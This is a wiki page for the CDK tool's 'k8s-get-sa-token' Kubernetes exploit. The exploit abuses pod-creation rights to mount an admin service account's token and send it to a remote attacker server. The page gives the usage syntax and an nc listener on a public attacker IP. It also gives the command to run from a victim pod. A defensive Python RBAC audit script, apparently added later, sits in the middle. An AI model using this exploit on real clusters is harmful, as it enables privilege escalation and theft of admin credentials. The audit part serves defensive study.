
Exploit: k8s get sa token

cdxy edited this page Mar 17, 2021 · 1 revision

Bypass Kubernetes RBAC with the pod-create privilege: if the current pod is allowed to create pods, this exploit can escalate to cluster admin. It creates a pod with the target (admin) service account's token mounted, reads the token inside that pod, and sends it to a remote IP:port (the attacker's public server).
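The escalation described above only works where a subject that can create pods shares a namespace with a service account whose token it should not hold. As an added defender-side example (not part of CDK or this wiki page), the Python audit below lists the Role/ClusterRole rules that grant pod creation and pairs them with the service accounts whose tokens a pod in that namespace would receive. It generalises beyond the page by also treating workload controllers (Deployments, Jobs and so on) as pod creators, since their pod templates accept a serviceAccountName too. The role and service-account objects are constructed samples whose field shapes follow the rbac.authorization.k8s.io/v1 and core/v1 APIs; in a real cluster you would feed it the JSON from `kubectl get roles,clusterroles -o json` and `kubectl get serviceaccounts -o json`. Bindings are not evaluated, so a listed role is a risk only once it is bound to a subject you do not trust with those tokens.

```python
"""Audit helper: find RBAC rules that let a subject create pods, and the service
accounts whose tokens such a pod could be handed. Inputs are constructed samples
mimicking `kubectl ... -o json` output (only the fields used here are present)."""
from typing import Dict, Iterable, List, Tuple

# Resources whose "create" verb lets a subject run a pod with an arbitrary
# serviceAccountName in the namespace: pods directly, or controllers that
# create pods from an embedded pod template. Keyed by API group.
POD_CREATING = {
    "": {"pods"},
    "apps": {"deployments", "daemonsets", "replicasets", "statefulsets"},
    "batch": {"jobs", "cronjobs"},
}

# Constructed sample Role/ClusterRole objects (not from a real cluster).
SAMPLE_ROLES = [
    {"kind": "Role", "metadata": {"name": "ci-runner", "namespace": "ci"},
     "rules": [{"apiGroups": [""], "resources": ["pods"], "verbs": ["get", "list", "create"]}]},
    {"kind": "Role", "metadata": {"name": "viewer", "namespace": "ci"},
     "rules": [{"apiGroups": [""], "resources": ["pods", "services"], "verbs": ["get", "list", "watch"]}]},
    {"kind": "ClusterRole", "metadata": {"name": "deployer"},
     "rules": [{"apiGroups": ["apps"], "resources": ["deployments"], "verbs": ["*"]}]},
    {"kind": "Role", "metadata": {"name": "log-reader", "namespace": "prod"},
     "rules": [{"apiGroups": [""], "resources": ["pods/log"], "verbs": ["get"]}]},
]

# Constructed sample ServiceAccount objects. automountServiceAccountToken is
# unset on most of them, which the API treats as true.
SAMPLE_SAS = [
    {"metadata": {"name": "admin", "namespace": "ci"}},
    {"metadata": {"name": "default", "namespace": "ci"}},
    {"metadata": {"name": "deployer-sa", "namespace": "prod"}, "automountServiceAccountToken": False},
    {"metadata": {"name": "default", "namespace": "prod"}},
]


def rule_grants_pod_creation(rule: Dict) -> bool:
    """True if a single RBAC rule allows creating pods directly or via a controller."""
    verbs = set(rule.get("verbs", []))
    if not verbs & {"create", "*"}:
        return False
    groups = set(rule.get("apiGroups", []))
    resources = set(rule.get("resources", []))
    if "*" in groups and "*" in resources:
        return True
    for group, names in POD_CREATING.items():
        if (group in groups or "*" in groups) and (resources & names or "*" in resources):
            return True
    return False


def roles_granting_pod_creation(roles: Iterable[Dict]) -> List[Tuple[str, str, str]]:
    """Return (kind, namespace, name) for each Role/ClusterRole that can create pods.
    ClusterRoles are reported with namespace '*' because they apply everywhere."""
    hits = []
    for role in roles:
        if any(rule_grants_pod_creation(r) for r in role.get("rules", [])):
            meta = role["metadata"]
            hits.append((role["kind"], meta.get("namespace", "*"), meta["name"]))
    return hits


def service_accounts_with_automount(sas: Iterable[Dict]) -> List[Tuple[str, str]]:
    """Service accounts whose token is mounted by default into any pod naming them."""
    return [
        (sa["metadata"]["namespace"], sa["metadata"]["name"])
        for sa in sas
        if sa.get("automountServiceAccountToken", True) is not False
    ]


def exposure_report(roles: Iterable[Dict], sas: Iterable[Dict]) -> List[Dict]:
    """Per namespace: pod-creating roles in scope next to the service accounts whose
    tokens a pod created there could receive. Namespaces with no creator are omitted."""
    creators = roles_granting_pod_creation(roles)
    accounts = service_accounts_with_automount(sas)
    report = []
    for ns in sorted({ns for ns, _ in accounts}):
        in_scope = [f"{kind}/{name}" for kind, rns, name in creators if rns in (ns, "*")]
        if in_scope:
            report.append({
                "namespace": ns,
                "pod_creators": in_scope,
                "exposed_service_accounts": sorted(name for sns, name in accounts if sns == ns),
            })
    return report


if __name__ == "__main__":
    import json
    print(json.dumps(exposure_report(SAMPLE_ROLES, SAMPLE_SAS), indent=2))
```

Note that `automountServiceAccountToken: false` on a service account only stops the default mount; a pod spec can still request that account's token through a projected volume, so the durable fix is to keep pod-creating roles out of namespaces that hold privileged service accounts (or bind them only to subjects you already trust with those accounts).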

Usage

cdk run k8s-get-sa-token (default|anonymous|<service-account-token-path>) <target-service-account> <ip> <port>

Request Options:
default: connect to the API server with the pod's default service account token
anonymous: connect to the API server as the user system:anonymous
<service-account-token-path>: connect to the API server with a user-specified service account token

Exploit Options:
target-service-account: name of the service account whose token to dump (e.g. admin).
ip: remote IP to which the dumped token is sent.
port: remote port to which the dumped token is sent.

Example

First, listen on a port on a public server to receive the data.

(on attacker's public server, e.g. 39.104.80.49)
nc -lvp 999

Inside a victim pod that has the "create pod" privilege, run the CDK exploit to dump the "admin" service account's token.

(in victim pod)
./cdk run k8s-get-sa-token default admin 39.104.80.49 999

